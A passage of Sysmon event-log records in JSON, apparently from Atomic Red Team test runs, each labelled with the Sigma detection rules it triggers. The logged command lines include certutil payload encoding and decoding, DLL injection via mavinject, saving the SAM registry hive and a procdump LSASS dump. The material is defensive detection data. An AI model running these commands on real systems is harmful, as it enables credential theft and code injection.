14:54:01.900"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":4051,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:54:01.925833Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"certutil.exe -encode c:\\file.exe file.txt\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-DA3F-5D31-0000-00104C173C00","ProcessId":4832,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:03.223"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4061,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:03.235828Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"certutil.exe -encode c:\\file.exe file.txt","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"CertUtil.exe","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4","Image":"C:\\Windows\\System32\\certutil.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"certutil.exe -encode c:\\file.exe file.txt\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA3F-5D31-0000-00104C173C00","ParentProcessId":4832,"ProcessGuid":"747F3D96-DA3F-5D31-0000-00109E193C00","ProcessId":1260,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:03.261"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4062,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:03.309488Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"certutil.exe -decode file.txt c:\\file.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-DA3F-5D31-0000-0010562E3C00","ProcessId":4020,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:03.786"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4063,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:03.961276Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"certutil.exe -decode file.txt c:\\file.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"CertUtil.exe","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4","Image":"C:\\Windows\\System32\\certutil.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"certutil.exe -decode file.txt c:\\file.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA3F-5D31-0000-0010562E3C00","ParentProcessId":4020,"ProcessGuid":"747F3D96-DA3F-5D31-0000-001022323C00","ProcessId":6888,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:03.818"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4064,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:03.974754Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Copy From or To System32"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"cmd.exe /c copy %%windir%%\\\\system32\\\\certutil.exe %%temp%%tcm.tmp\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-DA40-5D31-0000-00106A543C00","ProcessId":6572,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:04.236"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4066,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:04.270645Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Copy From or To System32"],"event":{"Event":{"EventData":{"CommandLine":"cmd.exe /c copy C:\\Windows\\\\system32\\\\certutil.exe C:\\Users\\IEUser\\AppData\\Local\\Temptcm.tmp","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"cmd.exe /c copy %windir%\\\\system32\\\\certutil.exe %temp%tcm.tmp\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA40-5D31-0000-00106A543C00","ParentProcessId":6572,"ProcessGuid":"747F3D96-DA40-5D31-0000-0010B1553C00","ProcessId":5168,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:04.256"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4067,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:04.294575Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"cmd.exe /c %%temp%%tcm.tmp -decode c:\\file.exe file.txt\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-DA40-5D31-0000-0010CF5A3C00","ProcessId":4336,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:04.316"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4068,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:04.333864Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"cmd.exe /c C:\\Users\\IEUser\\AppData\\Local\\Temptcm.tmp -decode c:\\file.exe file.txt","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"cmd.exe /c %temp%tcm.tmp -decode c:\\file.exe file.txt\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA40-5D31-0000-0010CF5A3C00","ParentProcessId":4336,"ProcessGuid":"747F3D96-DA40-5D31-0000-0010565D3C00","ProcessId":3932,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:04.346"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4069,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:04.361122Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Users\\IEUser\\AppData\\Local\\Temptcm.tmp -decode c:\\file.exe file.txt","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"CertUtil.exe","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4","Image":"C:\\Users\\IEUser\\AppData\\Local\\Temptcm.tmp","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"cmd.exe /c C:\\Users\\IEUser\\AppData\\Local\\Temptcm.tmp -decode c:\\file.exe file.txt","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA40-5D31-0000-0010565D3C00","ParentProcessId":3932,"ProcessGuid":"747F3D96-DA40-5D31-0000-0010AB5F3C00","ProcessId":6260,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:04.381"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4070,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:04.412850Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MavInject Process Injection"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\mavinject.exe\" 3912 /INJECTRUNNING C:\\AtomicRedTeam\\atomics\\T1055\\src\\x64\\T1055.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft Application Virtualization Injector","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=3627AD593F3A956FA07382914B52AAB5CE98C817,MD5=72D5E2A3FF5D88C891E0DF1AA28B6422,SHA256=ABB99F7CFD3E9EB294501AAFA082A8D4841278CC39A4FB3DFF9942CA1F71A139,IMPHASH=96A5873241D90136570C05E55F0B5B2A","Image":"C:\\Windows\\System32\\mavinject.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-DA4B-5D31-0000-0010CB413D00","ProcessId":2604,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:15.754"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4078,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:15.776993Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Interactive AT Job"],"event":{"Event":{"EventData":{"CommandLine":"at 13:20 /interactive cmd","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Schedule service command line interface","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=EC6F04AA61D8F0FA0945EBFC58F6CC7CEBB1377A,MD5=F4416891D11BBA6975E5067FA10507C8,SHA256=73A9A6A4C9CF19FCD117EB3C430E1C9ACADED31B42875BA4F02FA61DA1B8A6DC,IMPHASH=FA9A9B0D471E4B5F3683C346C3D880BD","Image":"C:\\Windows\\System32\\at.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"at 13:20 /interactive cmd\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA6A-5D31-0000-0010B2953E00","ParentProcessId":5036,"ProcessGuid":"747F3D96-DA6A-5D31-0000-001004983E00","ProcessId":3864,"Product":"Microsoft® Windows® Operating System","RuleName":"Persistence - Scheduled Task Management AT","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:46.087"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4083,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:46.094355Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Indirect Command Execution"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\calc.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"c:\\windows\\system32\\","Description":"Windows Calculator","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"forfiles /p c:\\windows\\system32 /m notepad.exe /c calc.exe","ParentImage":"C:\\Windows\\System32\\forfiles.exe","ParentProcessGuid":"747F3D96-DA72-5D31-0000-001056513F00","ParentProcessId":3680,"ProcessGuid":"747F3D96-DA72-5D31-0000-0010B1543F00","ProcessId":3160,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:54.160"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4101,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:54.165319Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-07-19 15:10:52.699","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ProcessId":5840,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\3ivx11ib\\3ivx11ib.dll","UtcTime":"2019-07-19 15:10:52.699"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":4109,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-07-19T15:10:52.700901Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /user","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ParentProcessId":5840,"ProcessGuid":"747F3D96-DD8B-5D31-0000-001094584A00","ProcessId":5792,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 15:11:07.987"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4110,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T15:11:07.994501Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg save HKLM\\sam sam\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ParentProcessId":5840,"ProcessGuid":"747F3D96-DD95-5D31-0000-001075964A00","ProcessId":7140,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 15:11:17.211"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4117,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T15:11:17.224751Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Usage of Sysinternals Tools","Suspicious Use of Procdump on LSASS","Renamed ProcDump","LSASS Memory Dumping","Suspicious Use of Procdump","Procdump Usage"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 